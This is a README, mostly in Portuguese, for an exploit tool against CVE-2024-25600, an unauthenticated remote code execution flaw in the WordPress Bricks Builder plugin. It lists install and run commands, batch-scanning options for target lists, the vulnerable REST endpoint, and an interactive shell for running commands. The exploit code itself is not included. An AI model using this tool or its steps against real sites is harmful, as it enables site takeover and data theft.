
Unauthenticated RCE exploit for CVE-2024-25600 in WordPress Bricks Builder <= 1.9.6. Executes arbitrary code remotely.
Um script de exploit para CVE-2024-25600, uma vulnerabilidade crítica de Execução Remota de Código (RCE) não autenticada no plugin Bricks Builder para WordPress. Esta ferramenta detecta a falha, extrai o nonce e fornece um shell interativo para executar comandos arbitrários em alvos vulneráveis. Testado na versão 1.9.5 do Bricks Builder, afeta todas as versões até a 1.9.6 inclusive. Esta falha de segurança permite que atacantes injetem e executem código PHP malicioso remotamente sem autenticação, potencialmente levando a comprometimento total do site, roubo de dados ou distribuição de malware.
pip install requests beautifulsoup4 prompt_toolkit
python3 exploit.py -u <target_url> [opções]
-u, --url: URL alvo WordPress (ex: http://example.com) - obrigatório para varredura única.-l, --list: Caminho para um arquivo com uma lista de URLs para varredura RCE em lote (opcional).-o, --output: Arquivo para salvar URLs WordPress vulneráveis (opcional).python3 exploit.py -u http://10.10.10.10
python3 exploit.py -l targets.txt -o vulnerable.txt
# whoami
# exit
/wp-json/bricks/v1/render_element.max_workers no script para ajustes de desempenho.[email protected] para suporte ou problemas!Esta ferramenta é apenas para fins educacionais e de testes de segurança autorizados. A exploração não autorizada de CVE-2024-25600 é ilegal e antiética.